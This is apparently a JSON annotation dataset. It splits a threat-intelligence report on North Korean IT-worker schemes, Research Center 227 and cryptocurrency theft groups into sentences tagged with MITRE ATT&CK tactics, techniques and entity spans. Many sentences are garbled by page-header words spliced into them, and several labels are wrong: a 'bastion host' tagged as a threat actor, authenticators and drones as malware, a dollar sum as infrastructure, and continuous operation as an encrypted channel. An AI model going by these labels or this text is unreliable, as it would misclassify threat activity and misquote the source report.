"Uses Company A as bastion host to remote into other organizational infrastructure", "entities": [ { "text": "Company A", "start": 10, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "bastion host", "start": 51, "end": 63, "label": "ThreatActor" }, { "text": "remote into", "start": 67, "end": 78, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p18-s150-e788fe", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 18, "sentence_id": 150, "context_before": "COMPANY A\nCompany A could potentially be used as a bastion host to remote into infrastructure for In some cases, other organizations.", "sentence_text": "the worker may accidentally access VDI infrastructure for other organizations (Company B) while conducting work for their current org COMPANY B VDI (Company A).", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Accesses VDI infrastructure for other organizations while working for current organization", "entities": [ { "text": "VDI infrastructure", "start": 35, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "Company A", "start": 149, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "Company B", "start": 79, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "access ", "start": 28, "end": 35, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p18-s151-9fa6e8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 18, "sentence_id": 151, "context_before": "the worker may accidentally access VDI infrastructure for other organizations (Company B) while conducting work for their current org COMPANY B VDI (Company A).", "sentence_text": "Infrastructure Access\nto Multiple Industries 18 These VDI instances are set up for non-IT/software- related organizations but Worker employs MFA to access VDI across multiple different sessions via mobile authenticators.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Employs MFA via mobile authenticators to access VDI across multiple industries", "entities": [ { "text": "Worker ", "start": 126, "end": 133, "label": "ThreatActor" }, { "text": " mobile authenticators", "start": 197, "end": 219, "label": "MalwareTool" }, { "text": "VDI instances ", "start": 54, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "Multiple Industries", "start": 25, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "employs MFA", "start": 133, "end": 144, "label": "Action" }, { "text": "access ", "start": 148, "end": 155, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p18-s152-b3b1c0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 18, "sentence_id": 152, "context_before": "Infrastructure Access\nto Multiple Industries 18 These VDI instances are set up for non-IT/software- related organizations but Worker employs MFA to access VDI across multiple different sessions via mobile authenticators.", "sentence_text": "WORKFORCE IT HIDDEN AND lapses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p18-s153-0717ac", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 18, "sentence_id": 153, "context_before": "WORKFORCE IT HIDDEN AND lapses.", "sentence_text": "In multiple instances, actors have used the same or similar credentials across entirely CYBER separate victim environments—unwittingly linking their false identities across employer networks.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Used same/similar credentials across separate victim environments", "entities": [ { "text": "credentials ", "start": 60, "end": 72, "label": "Infrastructure_Indicator" }, { "text": " victim environments", "start": 102, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "employer networks", "start": 173, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "used ", "start": 35, "end": 40, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p19-s154-a39fb4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 19, "sentence_id": 154, "context_before": "In multiple instances, actors have used the same or similar credentials across entirely CYBER separate victim environments—unwittingly linking their false identities across employer networks.", "sentence_text": "The system also incentivizes reporting colleagues for “unpatriotic” behavior and using every advantage to stay on top, with little regard for the impact that may have on them and their families.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p19-s155-057dbc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 19, "sentence_id": 155, "context_before": "The system also incentivizes reporting colleagues for “unpatriotic” behavior and using every advantage to stay on top, with little regard for the impact that may have on them and their families.", "sentence_text": "We assess that some North Korean teams have probably stolen from other North Koreans, even if they didn’t realize they were stealing from a compatriot.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Stole from other North Korean teams", "entities": [ { "text": " North Korean teams", "start": 19, "end": 38, "label": "ThreatActor" }, { "text": "stolen ", "start": 53, "end": 60, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p19-s156-9a90e6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 19, "sentence_id": 156, "context_before": "We assess that some North Korean teams have probably stolen from other North Koreans, even if they didn’t realize they were stealing from a compatriot.", "sentence_text": "With the amount of North Korean activity targeting software and blockchain developers on sites like Github and LinkedIn from groups like CryptoCore and those conducting the Contagious Interview campaigns, it’s very likely that North Korean developers masquerading under a different nationality or pseudonymous usernames have been targeted and ultimately victims of these groups’ operations (similar activity also echoed in IT worker activity).", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Targets software/blockchain developers on Github and LinkedIn while masquerading identities", "entities": [ { "text": "CryptoCore", "start": 137, "end": 147, "label": "ThreatActor" }, { "text": "North Korean developers ", "start": 227, "end": 251, "label": "ThreatActor" }, { "text": "Github ", "start": 100, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "LinkedIn ", "start": 111, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "pseudonymous usernames", "start": 297, "end": 319, "label": "Infrastructure_Indicator" }, { "text": "masquerading ", "start": 251, "end": 264, "label": "Action" }, { "text": "targeting ", "start": 41, "end": 51, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p19-s157-fbba26", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 19, "sentence_id": 157, "context_before": "With the amount of North Korean activity targeting software and blockchain developers on sites like Github and LinkedIn from groups like CryptoCore and those conducting the Contagious Interview campaigns, it’s very likely that North Korean developers masquerading under a different nationality or pseudonymous usernames have been targeted and ultimately victims of these groups’ operations (similar activity also echoed in IT worker activity).", "sentence_text": "WORKFORCE IT HIDDEN AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p20-s159-9f15c5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 20, "sentence_id": 159, "context_before": "DPRK:", "sentence_text": "These missions are assessed to be relatively stable while the unit designations and personnel supporting each mission may move between missions on a much more regular basis than was previously understood.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p20-s160-41c291", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 20, "sentence_id": 160, "context_before": "These missions are assessed to be relatively stable while the unit designations and personnel supporting each mission may move between missions on a much more regular basis than was previously understood.", "sentence_text": "We also want to highlight that DPRK’s cyber program probably houses at most a few hundred skilled operators—far fewer than the 7,000+ personnel figures often cited.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p20-s161-dfa058", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 20, "sentence_id": 161, "context_before": "We also want to highlight that DPRK’s cyber program probably houses at most a few hundred skilled operators—far fewer than the 7,000+ personnel figures often cited.", "sentence_text": "These patterns strongly suggest that the core of trained, mission-ready hackers is much smaller than commonly assumed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p20-s162-e809dc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 20, "sentence_id": 162, "context_before": "These patterns strongly suggest that the core of trained, mission-ready hackers is much smaller than commonly assumed.", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p21-s163-557832", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 21, "sentence_id": 163, "context_before": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "The report stated that North Korean leader Kim Jong-un supervised tests of new AI-equipped suicide drones, marking a significant advancement in the nation’s military capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Supervised tests of new AI-equipped suicide drones", "entities": [ { "text": " North Korean", "start": 22, "end": 35, "label": "ThreatActor" }, { "text": "Kim Jong-un ", "start": 43, "end": 55, "label": "ThreatActor" }, { "text": "AI-equipped suicide drones", "start": 79, "end": 105, "label": "MalwareTool" }, { "text": "supervised tests", "start": 55, "end": 71, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p21-s164-a91ef6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 21, "sentence_id": 164, "context_before": "The report stated that North Korean leader Kim Jong-un supervised tests of new AI-equipped suicide drones, marking a significant advancement in the nation’s military capabilities.", "sentence_text": "State media reported that Kim emphasized the importance of prioritizing unmanned systems and AI technologies in modernizing the armed forces.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Emphasized prioritizing unmanned systems and AI technologies for military modernization", "entities": [ { "text": " unmanned systems", "start": 71, "end": 88, "label": "Infrastructure_Indicator" }, { "text": " AI technologies", "start": 92, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "modernizing ", "start": 112, "end": 124, "label": "Action" }, { "text": "prioritizing ", "start": 59, "end": 72, "label": "Action" }, { "text": "emphasized ", "start": 30, "end": 41, "label": "Action" }, { "text": "Kim ", "start": 26, "end": 30, "label": "ThreatActor" } ] }, { "uid": "mitre-79_mitre_report-p21-s165-c35539", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 21, "sentence_id": 165, "context_before": "State media reported that Kim emphasized the importance of prioritizing unmanned systems and AI technologies in modernizing the armed forces.", "sentence_text": "To further the point of blended operations and how each part plays into the larger system, trusted partners and investigations noted APT groups such as TEMP.Hermit, Ruby Sleet, and likely APT45 elements had drone-specific targeting and interests.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Targeted drone-related systems and infrastructure", "entities": [ { "text": "APT45 ", "start": 188, "end": 194, "label": "ThreatActor" }, { "text": "TEMP.Hermit", "start": 152, "end": 163, "label": "ThreatActor" }, { "text": "Ruby Sleet", "start": 165, "end": 175, "label": "ThreatActor" }, { "text": "drone-specific targeting", "start": 207, "end": 231, "label": "Infrastructure_Indicator" }, { "text": "targeting", "start": 222, "end": 231, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p21-s166-c37f70", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 21, "sentence_id": 166, "context_before": "To further the point of blended operations and how each part plays into the larger system, trusted partners and investigations noted APT groups such as TEMP.Hermit, Ruby Sleet, and likely APT45 elements had drone-specific targeting and interests.", "sentence_text": "AND SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p22-s167-6dbaf4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 22, "sentence_id": 167, "context_before": "AND SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "Research Center 227 Research Center 227 is a newly established North Korean cyber warfare unit focused on the development of advanced hacking technologies, particularly those leveraging AI, to enhance the DPRK’s offensive cyber capabilities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Develops advanced hacking technologies using AI for offensive cyber capabilities", "entities": [ { "text": "North Korean", "start": 63, "end": 75, "label": "ThreatActor" }, { "text": "Research Center 227", "start": 0, "end": 19, "label": "ThreatActor" }, { "text": " Research Center 227", "start": 19, "end": 39, "label": "ThreatActor" }, { "text": "development ", "start": 110, "end": 122, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p22-s168-686054", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 22, "sentence_id": 168, "context_before": "Research Center 227 Research Center 227 is a newly established North Korean cyber warfare unit focused on the development of advanced hacking technologies, particularly those leveraging AI, to enhance the DPRK’s offensive cyber capabilities.", "sentence_text": "Located in Pyongyang’s Mangyongdae District, Research Center 227 operates continuously, enabling real-time responses to intelligence gathered by RGB-affiliated hacking groups deployed overseas.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Operates continuously to enable real-time responses to overseas intelligence", "entities": [ { "text": "Research Center 227 ", "start": 45, "end": 65, "label": "ThreatActor" }, { "text": " RGB-affiliated hacking groups", "start": 144, "end": 174, "label": "ThreatActor" }, { "text": "responses ", "start": 107, "end": 117, "label": "Action" }, { "text": "operates ", "start": 65, "end": 74, "label": "Action" }, { "text": "Pyongyang’s Mangyongdae District", "start": 11, "end": 43, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p22-s169-78b13f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 22, "sentence_id": 169, "context_before": "Located in Pyongyang’s Mangyongdae District, Research Center 227 operates continuously, enabling real-time responses to intelligence gathered by RGB-affiliated hacking groups deployed overseas.", "sentence_text": "Other key institutions fueling the DPRK’s cyber talent pipeline include Mirim College and Kimchaek University of Technology, the latter of which has been directly observed supporting the sanctioned Korea Ryonbong General Corporation.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Supports sanctioned entities through educational institutions", "entities": [ { "text": "DPRK", "start": 35, "end": 39, "label": "ThreatActor" }, { "text": " Mirim College", "start": 71, "end": 85, "label": "Infrastructure_Indicator" }, { "text": " Kimchaek University of Technology", "start": 89, "end": 123, "label": "Infrastructure_Indicator" }, { "text": " Korea Ryonbong General Corporation", "start": 197, "end": 232, "label": "Infrastructure_Indicator" }, { "text": "supporting ", "start": 172, "end": 183, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p22-s170-193aa7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 22, "sentence_id": 170, "context_before": "Other key institutions fueling the DPRK’s cyber talent pipeline include Mirim College and Kimchaek University of Technology, the latter of which has been directly observed supporting the sanctioned Korea Ryonbong General Corporation.", "sentence_text": "The primary objectives of Research Center 227 WORKFORCE IT include creating techniques to neutralize security networks, developing AI-based information HIDDEN theft technologies, hacking financial assets, and AND establishing automated programs for information collection and analysis.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" }, { "id": "T1119", "name": "Automated Collection" }, { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Creates techniques to neutralize security networks, develops AI-based information theft, hacks financial assets, and establishes automated collection programs", "entities": [ { "text": "Research Center 227", "start": 26, "end": 45, "label": "ThreatActor" }, { "text": "security networks", "start": 101, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "financial assets", "start": 187, "end": 203, "label": "Infrastructure_Indicator" }, { "text": "hacking ", "start": 179, "end": 187, "label": "Action" }, { "text": "creating ", "start": 67, "end": 76, "label": "Action" }, { "text": "developing ", "start": 120, "end": 131, "label": "Action" }, { "text": "establishing ", "start": 213, "end": 226, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p22-s172-6dc2de", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 22, "sentence_id": 172, "context_before": "SYNDICATE", "sentence_text": "Kim Il Sung Military University.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p23-s174-abc3f5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 23, "sentence_id": 174, "context_before": "EXPOSING", "sentence_text": "Research Center 227:\nThree Hypotheses\nWe have developed three competing hypotheses to explain why the regime has created Research Center 227 now, with one (number three)\nleading the charge:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p23-s175-5fcd23", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 23, "sentence_id": 175, "context_before": "Research Center 227:\nThree Hypotheses\nWe have developed three competing hypotheses to explain why the regime has created Research Center 227 now, with one (number three)\nleading the charge:\n1.", "sentence_text": "The Research Center 227 staff are IT workers specializing in AI-related freelance work.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Specializes in AI-related freelance work", "entities": [ { "text": "Research Center 227", "start": 4, "end": 23, "label": "ThreatActor" }, { "text": " AI-related freelance work", "start": 60, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "specializing ", "start": 45, "end": 58, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p23-s176-60d9f7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 23, "sentence_id": 176, "context_before": "The Research Center 227 staff are IT workers specializing in AI-related freelance work.", "sentence_text": "This organization could be the new designator for this clustering of IT workers in AI roles.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p23-s177-ef028f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 23, "sentence_id": 177, "context_before": "This organization could be the new designator for this clustering of IT workers in AI roles.", "sentence_text": "The center is supposed to aid in DPRK offensive operations and may also engage in hacking.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "Aids in offensive operations and engages in hacking", "entities": [ { "text": "DPRK ", "start": 33, "end": 38, "label": "ThreatActor" }, { "text": "engage in hacking", "start": 72, "end": 89, "label": "Action" }, { "text": "aid ", "start": 26, "end": 30, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p23-s178-a8e047", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 23, "sentence_id": 178, "context_before": "The center is supposed to aid in DPRK offensive operations and may also engage in hacking.", "sentence_text": "Research Center 227 staff could be tasked with providing AI-related support to operations, such as using AI to create phishing lure documents, fake IDs, etc.\n3.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" }, { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "Uses AI to create phishing lures and fake IDs for operational support", "entities": [ { "text": "Research Center 227", "start": 0, "end": 19, "label": "ThreatActor" }, { "text": "phishing lure documents", "start": 118, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "fake IDs", "start": 143, "end": 151, "label": "Infrastructure_Indicator" }, { "text": "using AI ", "start": 99, "end": 108, "label": "Action" }, { "text": "providing ", "start": 47, "end": 57, "label": "Action" }, { "text": "create ", "start": 111, "end": 118, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p23-s179-890cdb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 23, "sentence_id": 179, "context_before": "Research Center 227 staff could be tasked with providing AI-related support to operations, such as using AI to create phishing lure documents, fake IDs, etc.\n3.", "sentence_text": "23 WORKFORCE The presence of skilled IT workers embedded in AI IT organizations globally—alongside clear concerns about HIDDEN being isolated from external technologies and an AND inability to rely on foreign AI systems if cut off—strongly SYNDICATE indicates the underlying motive behind this group’s CYBER formation.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Embeds skilled IT workers in global AI organizations", "entities": [ { "text": " AI IT organizations ", "start": 59, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "embedded ", "start": 48, "end": 57, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p23-s180-7598ac", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 23, "sentence_id": 180, "context_before": "23 WORKFORCE The presence of skilled IT workers embedded in AI IT organizations globally—alongside clear concerns about HIDDEN being isolated from external technologies and an AND inability to rely on foreign AI systems if cut off—strongly SYNDICATE indicates the underlying motive behind this group’s CYBER formation.", "sentence_text": "Developing a domestic AI capability is likely DPRK’S a calculated move to ensure operational continuity and strategic advantage.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Develops domestic AI capability for operational continuity and strategic advantage", "entities": [ { "text": " DPRK", "start": 45, "end": 50, "label": "ThreatActor" }, { "text": "Developing ", "start": 0, "end": 11, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p24-s182-bd77d3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 182, "context_before": "EXPOSING", "sentence_text": "The Crypto Mission It is widely reported that the DPRK has units that specialize in “North Korea’s cyber cryptocurrency theft, particularly after the SWIFT network hardened to operations remainprevent further bank heists like APT38’s $81 million heist from the Bank of Bangladesh.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Specializes in cryptocurrency theft after SWIFT network hardening", "entities": [ { "text": "DPRK ", "start": 50, "end": 55, "label": "ThreatActor" }, { "text": "APT38", "start": 226, "end": 231, "label": "ThreatActor" }, { "text": "SWIFT network", "start": 150, "end": 163, "label": "Infrastructure_Indicator" }, { "text": "Bank of Bangladesh", "start": 261, "end": 279, "label": "Infrastructure_Indicator" }, { "text": "specialize ", "start": 70, "end": 81, "label": "Action" }, { "text": "theft", "start": 120, "end": 125, "label": "Action" }, { "text": "heists ", "start": 214, "end": 221, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p24-s183-5e0ee8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 183, "context_before": "The Crypto Mission It is widely reported that the DPRK has units that specialize in “North Korea’s cyber cryptocurrency theft, particularly after the SWIFT network hardened to operations remainprevent further bank heists like APT38’s $81 million heist from the Bank of Bangladesh.", "sentence_text": "and fraud in uniquely TraderTraitor (a.k.a.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p24-s184-671818", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 184, "context_before": "and fraud in uniquely TraderTraitor (a.k.a.", "sentence_text": "Jade Sleet, UNC4899) adaptive ways.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p24-s185-9aacb8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 185, "context_before": "Jade Sleet, UNC4899) adaptive ways.", "sentence_text": "people, companies, and In the Bybit heist, TraderTraitor actors exploited vulnerabilities during organizations aroundroutine wallet transfers, manipulating transaction processes to redirect WORKFORCEsubstantial funds to addresses under their control.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Exploited wallet transfer vulnerabilities to redirect funds", "entities": [ { "text": "TraderTraitor ", "start": 43, "end": 57, "label": "ThreatActor" }, { "text": "Bybit ", "start": 30, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "wallet transfers", "start": 125, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "transaction processes", "start": 156, "end": 177, "label": "Infrastructure_Indicator" }, { "text": "exploited vulnerabilities", "start": 64, "end": 89, "label": "Action" }, { "text": "manipulating ", "start": 143, "end": 156, "label": "Action" }, { "text": "redirect ", "start": 181, "end": 190, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p24-s186-4002b7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 186, "context_before": "people, companies, and In the Bybit heist, TraderTraitor actors exploited vulnerabilities during organizations aroundroutine wallet transfers, manipulating transaction processes to redirect WORKFORCEsubstantial funds to addresses under their control.", "sentence_text": "Additionally, in May the globe.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p24-s187-b8e52d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 187, "context_before": "Additionally, in May the globe.”", "sentence_text": "IT 2024, they were responsible for the theft of approximately $308 million Taylor Monahan (a.k.a.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Responsible for theft of approximately $308 million", "entities": [ { "text": "theft ", "start": 39, "end": 45, "label": "Action" }, { "text": " $308 million", "start": 61, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p24-s188-bc5d53", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 188, "context_before": "IT 2024, they were responsible for the theft of approximately $308 million Taylor Monahan (a.k.a.", "sentence_text": "Tayvano)from Japan-based Bitcoin.DMM.com, employing sophisticated social HIDDEN Crypto expert, MetaMask engineering techniques to gain unauthorized access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Employed social engineering to gain unauthorized access to Bitcoin.DMM.com", "entities": [ { "text": " Japan-based Bitcoin.DMM.com", "start": 12, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "MetaMask ", "start": 95, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "employing ", "start": 42, "end": 52, "label": "Action" }, { "text": "gain unauthorized access", "start": 130, "end": 154, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p24-s189-32f38e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 189, "context_before": "Tayvano)from Japan-based Bitcoin.DMM.com, employing sophisticated social HIDDEN Crypto expert, MetaMask engineering techniques to gain unauthorized access.", "sentence_text": "TraderTraitor is arguably the most prolific of any of the DPRK APT groups when it comes to cryptocurrency theft and seems to CYBER have housed the most talent from the original APT38 effort.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Most prolific DPRK group for cryptocurrency theft, housing talent from APT38", "entities": [ { "text": "TraderTraitor ", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "DPRK", "start": 58, "end": 62, "label": "ThreatActor" }, { "text": "APT38 ", "start": 177, "end": 183, "label": "ThreatActor" }, { "text": "theft ", "start": 106, "end": 112, "label": "Action" }, { "text": "housed the most talent", "start": 136, "end": 158, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p24-s190-2a35df", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 24, "sentence_id": 190, "context_before": "TraderTraitor is arguably the most prolific of any of the DPRK APT groups when it comes to cryptocurrency theft and seems to CYBER have housed the most talent from the original APT38 effort.", "sentence_text": "TraderTraitor has also conducted cyber espionage operations against defense DPRK’S industrial base targets, furthering the idea that DPRK watchers need to focus on missions to not be fooled when a cluster seems to have “gone EXPOSING rogue” and targeted an element that appears anomalous to the defender.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Conducted cyber espionage against defense industrial base targets", "entities": [ { "text": "TraderTraitor ", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "DPRK ", "start": 133, "end": 138, "label": "ThreatActor" }, { "text": "DPRK", "start": 76, "end": 80, "label": "ThreatActor" }, { "text": "defense DPRK’S industrial base", "start": 68, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "conducted cyber espionage", "start": 23, "end": 48, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p25-s191-0488de", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 191, "context_before": "TraderTraitor has also conducted cyber espionage operations against defense DPRK’S industrial base targets, furthering the idea that DPRK watchers need to focus on missions to not be fooled when a cluster seems to have “gone EXPOSING rogue” and targeted an element that appears anomalous to the defender.", "sentence_text": "Hermit intrusion set.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p25-s192-614e56", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 25, "sentence_id": 192, "context_before": "Hermit intrusion set.", "sentence_text": "AppleJeus primarily targets the cryptocurrency industry with the objective of stealing digital assets to support the regime’s financial needs.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Targets cryptocurrency industry to steal digital assets for regime funding", "entities": [ { "text": "AppleJeus ", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "cryptocurrency industry", "start": 32, "end": 55, "label": "Infrastructure_Indicator" }, { "text": "digital assets", "start": 87, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "targets ", "start": 20, "end": 28, "label": "Action" }, { "text": "stealing ", "start": 78, "end": 87, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p25-s193-d524f8", "source": "mitre", "doc_id": "79_mitre_report", 